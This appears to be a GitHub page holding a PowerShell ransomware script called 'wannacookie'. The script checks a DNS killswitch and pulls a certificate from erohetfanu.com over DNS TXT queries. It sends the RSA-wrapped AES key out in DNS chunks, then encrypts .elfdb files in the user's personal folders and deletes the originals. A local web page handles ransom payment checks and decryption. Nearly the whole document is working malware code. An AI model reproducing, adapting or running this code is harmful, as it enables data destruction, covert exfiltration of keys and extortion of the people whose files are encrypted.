Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 293 lines (288 sloc) 11.5 KB
$functions = {
function EncryptDecryptFile ($key,$File,$enc_it) {
[byte[]]$key = $key
$Suffix = "`.wannacookie"
[System.Reflection.Assembly]::LoadWithPartialName('System.Security.Cryptography')
[System.Int32]$KeySize = $key.Length * 8
$AESP = New-Object 'System.Security.Cryptography.AesManaged'
$AESP.Mode = [System.Security.Cryptography.CipherMode]::CBC
$AESP.BlockSize = 128
$AESP.KeySize = $KeySize
$AESP.Key = $key
$FileSR = New-Object System.IO.FileStream ($File,[System.IO.FileMode]::Open)
if ($enc_it) {
$DestFile = $File + $Suffix
} else {
$DestFile = ($File -replace $Suffix)
}
$FileSW = New-Object System.IO.FileStream ($DestFile,[System.IO.FileMode]::Create)
if ($enc_it) {
# generate IV - 16 bytes
$AESP.GenerateIV()
# write length of IV (16 or 10 00 00 00) to file
$FileSW.Write([System.BitConverter]::GetBytes($AESP.IV.Length),0,4)
# write IV to file
$FileSW.Write($AESP.IV,0,$AESP.IV.Length)
$Transform = $AESP.CreateEncryptor()
} else {
[Byte[]]$LenIV = New-Object Byte[] 4
$FileSR.Seek(0,[System.IO.SeekOrigin]::Begin) | Out-Null
$FileSR.Read($LenIV,0,3) | Out-Null
[int]$LIV = [System.BitConverter]::ToInt32($LenIV,0)
[Byte[]]$IV = New-Object Byte[] $LIV
$FileSR.Seek(4,[System.IO.SeekOrigin]::Begin) | Out-Null
$FileSR.Read($IV,0,$LIV) | Out-Null
$AESP.IV = $IV
$Transform = $AESP.CreateDecryptor()
}
$CryptoS = New-Object System.Security.Cryptography.CryptoStream ($FileSW,$Transform,[System.Security.Cryptography.CryptoStreamMode]::Write)
[int]$Count = 0
# BlockSzBts = 128 / 8 = 16
[int]$BlockSzBts = $AESP.BlockSize / 8
[Byte[]]$Data = New-Object Byte[] $BlockSzBts
do {
$Count = $FileSR.Read($Data,0,$BlockSzBts)
$CryptoS.Write($Data,0,$Count)
} while ($Count -gt 0)
$CryptoS.FlushFinalBlock()
$CryptoS.Close()
$FileSR.Close()
$FileSW.Close()
Clear-Variable -Name "key"
Remove-Item $File
}
}
function HexToByte {
param($HX)
$HX = $HX -split '(..)' | Where-Object {$_}
foreach ($value in $HX) {
[Convert]::ToInt32($value,16)
}
}
function ASCIIToHex () {
param($a)
$c = ''
$b = $a.ToCharArray();
foreach ($element in $b) {
$c = $c + " " + [System.String]::Format("{0:X}",[System.Convert]::ToUInt32($element))
}
return $c -replace ' '
}
function HexToASCII () {
param($a)
$outa
$a -split '(..)' | Where-Object {$_} | ForEach-Object {[char]([convert]::ToInt16($_,16))} | ForEach-Object {$outa = $outa + $_}
return $outa
}
function ByteToHex {
param($DEC)
$tmp = ''
foreach ($value in $DEC) {
$a = "{0:x}" -f [int]$value
if ($a.Length -eq 1) {
$tmp += '0' + $a
} else {
$tmp += $a
}
}
return $tmp
}
function XOR {
param($b1,$b2)
$b1 = $(HexToByte $b1)
$b2 = $(HexToByte $b2)
$cont = New-Object Byte[] $b1.count
if ($b1.count -eq $b2.count) {
for ($i = 0; $i -lt $b1.count; $i++) {
$cont[$i] = $b1[$i] -bxor $b2[$i]
}
}
return $cont
}
function B2G {
param([byte[]]$Data)
process {
$out = [System.IO.MemoryStream]::new()
$gStream = New-Object System.IO.Compression.GzipStream $out,([IO.Compression.CompressionMode]::Compress)
$gStream.Write($Data,0,$Data.Length)
$gStream.Close()
return $out.ToArray()
}
}
function GzipToBytes {
param([byte[]]$Data)
process {
$SrcData = New-Object System.IO.MemoryStream (,$Data)
$output = New-Object System.IO.MemoryStream
$gStream = New-Object System.IO.Compression.GzipStream $SrcData,([IO.Compression.CompressionMode]::Decompress)
$gStream.CopyTo($output)
$gStream.Close()
$SrcData.Close()
[byte[]]$byteArr = $output.ToArray()
return $byteArr
}
}
function SHA1 ([string]$String) {
$SB = New-Object System.Text.StringBuilder
[System.Security.Cryptography.HashAlgorithm]::Create("SHA1").ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String)) | ForEach-Object {
[void]$SB.Append($_.ToString("x2"))
}
$SB.ToString()
}
function PublicKeyEncrypt ($key_bytes,[byte[]]$pub_bytes) {
$cert = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Certificate2
$cert.Import($pub_bytes)
$encKey = $cert.PublicKey.Key.Encrypt($key_bytes,$true)
return $(ByteToHex $encKey)
}
function EncryptDecryptDrive {
param($key,$allfiles,$make_cookie)
$tcount = 12
$allfiles.Length | Out-String
for ($file = 0; $file -lt $allfiles.Length; $file++) {
while ($true) {
$running = @(Get-Job | Where-Object {$_.State -eq 'Running'})
if ($running.count -le $tcount) {
Start-Job -ScriptBlock {
param($key,$File,$true_false)
try {
"File", $File
EncryptDecryptFile($key, $File, $true_false)
} catch {
$_.Exception.Message | Out-String | Out-File $($env:userprofile + '\Desktop\ps_log.txt') -Append
}
} -args $key,$allfiles[$file],$make_cookie -InitializationScript $functions
break
} else {
Start-Sleep -m 200
continue
}
}
}
}
function GetOverDNS ($f) {
$godnsarg = "Called GetOverDNS({0})" -f (HexToASCII $f | Out-String).Trim()
Write-Host $godnsarg
$h = ''
foreach ($i in 0..([convert]::ToInt32($(Resolve-DnsName -Server erohetfanu.com -Name "$f.erohetfanu.com" -Type TXT).Strings,10) - 1)) {
Start-Sleep -m 50
$h += $(Resolve-DnsName -Server erohetfanu.com -Name "$i.$f.erohetfanu.com" -Type TXT).Strings
}
(HexToASCII $h) | Out-String | Out-File -FilePath (HexToASCII $f | Out-String).Trim()
Write-Host "Return from GetOverDNS"
return (HexToASCII $h)
}
function s_2_c ($astring,$size = 32) {
$new_arr = @()
$chunk_index = 0
foreach ($i in 1..$($astring.Length / $size)) {
$new_arr += @($astring.substring($chunk_index,$size))
$chunk_index += $size
}
return $new_arr
}
function SendKey ($encryption_key) {
$chunks = (s_2_c $encryption_key)
foreach ($j in $chunks) {
if ($chunks.IndexOf($j) -eq 0) {
$n_c_id = $(Resolve-DnsName -Server erohetfanu.com -Name "$j.6B6579666F72626F746964.erohetfanu.com" -Type TXT).Strings
} else {
$(Resolve-DnsName -Server erohetfanu.com -Name "$n_c_id.$j.6B6579666F72626F746964.erohetfanu.com" -Type TXT).Strings
}
}
return $n_c_id
}
function wannacookie {
$S1 = "1f8b080000000000040093e76762129765e2e1e6640f6361e7e202000cdd5c5c10000000"
# killswitch check
if ($null -ne ((Resolve-DnsName -Name $(HexToASCII $(ByteToHex $(XOR $(ByteToHex $(GzipToBytes $(HexToByte $S1))) $(Resolve-DnsName -Server erohetfanu.com -Name 6B696C6C737769746368.erohetfanu.com -Type TXT).Strings))).ToString() -ErrorAction 0 -Server 8.8.8.8))) {
return
}
# get server.crt, it will use its public key to encrypt the key before sending them out.
$p_k = [System.Convert]::FromBase64String($(GetOverDNS ("7365727665722E637274")))
# generate a "random" 16-byte encryption key.
$key = ([System.Text.Encoding]::Unicode.GetBytes($(([char[]]([char]01..[char]255) + ([char[]]([char]01..[char]255)) + 0..9 | sort {Get-Random})[0..15] -join '')) | Where-Object {$_ -ne 0x00 })
# encryption key converted to hex.
$keyHex = $(ByteToHex $key)
# keep a hash of encryption key for decryption later, if later the script gets a key, it will compare the hashes first.
$keyHash = $(SHA1 $keyHex)
# encrypt the encryption key with public key from the certificate.
$encryptedKey = (PublicKeyEncrypt $key $p_k).ToString()
# send the encrypted key out.
$c_id = (SendKey $encryptedKey)
$c_n_k = $(Resolve-DnsName -Server erohetfanu.com -Name ("$c_id.72616e736f6d697370616964.erohetfanu.com".trim()) -Type TXT).Strings
$d_t = (($(Get-Date).ToUniversalTime() | Out-String) -replace "`r`n")
[array]$f_c = $(Get-ChildItem *.elfdb -Exclude *.wannacookie -Path $($($env:userprofile + '\Desktop'),$($env:userprofile + '\Documents'),$($env:userprofile + '\Videos'),$($env:userprofile + '\Pictures'),$($env:userprofile + '\Music')) -Recurse | Where-Object { !$_.PSIsContainer } | ForEach-Object { $_.FullName })
# encrypt files.
$f_c | Out-String
EncryptDecryptDrive($key, $f_c, $true)
# these might be problematic later on for memory forensics.
Clear-Variable -Name "keyHex"
Clear-Variable -Name "key"
$lurl = 'http://127.0.0.1:8080/'
$html_c = @{
# if you uncomment this, it will take forever
# 'GET /' = $(GetOverDNS (ASCIIToHex "source.min.html"))
'GET /close' = '<p>Bye!</p>'
}
Start-Job -ScriptBlock {
param($url)
Start-Sleep 10
Add-Type -AssemblyName System.Windows.Forms
Start-Process "$url" -WindowStyle Maximized
Start-Sleep 2
[System.Windows.Forms.SendKeys]::SendWait("{F11}")
} -Arg $lurl
$list = New-Object System.Net.HttpListener
$list.Prefixes.Add($lurl)
$list.Start()
try {
$close = $false
while ($list.IsListening) {
$context = $list.GetContext()
$Req = $context.Request
$Resp = $context.Response
$recvd = '{0} {1}' -f $Req.httpmethod,$Req.url.localpath
if ($recvd -eq 'GET /') {
$html = $html_c[$recvd]
} elseif ($recvd -eq 'GET /decrypt') {
# here's where the decrypting happens.
$akey = $Req.QueryString.Item("key")
# hash of received key is compared to the one that was calculated when it was generated.
if ($keyHash -eq $(SHA1 $akey)) {
$akey = $(HexToByte $akey)
[array]$f_c = $(Get-ChildItem -Path $($env:userprofile) -Recurse -Filter *.wannacookie | Where-Object { !$_.PSIsContainer } | ForEach-Object { $_.FullName })
EncryptDecryptDrive($akey, $f_c, $false)
$html = "Files have been decrypted!"
$close = $true
} else {
$html = "Invalid Key!"
}
} elseif ($recvd -eq 'GET /close') {
$close = $true
$html = $html_c[$recvd]
} elseif ($recvd -eq 'GET /cookie_is_paid') {
$c_n_k = $(Resolve-DnsName -Server erohetfanu.com -Name ("$c_id.72616e736f6d697370616964.erohetfanu.com".trim()) -Type TXT).Strings
if ($c_n_k.Length -eq 32) {
$html = $c_n_k
} else {
$html = "UNPAID|$c_id|$d_t"
}
} else {
$Resp.statuscode = 404
$html = '<h1>404 Not Found</h1>'
}
$buffer = [Text.Encoding]::UTF8.GetBytes($html)
$Resp.ContentLength64 = $buffer.Length
$Resp.OutputStream.Write($buffer,0,$buffer.Length)
$Resp.Close()
if ($close) {
$list.Stop()
return
}
}
} finally {
$list.Stop()
}
}
wannacookie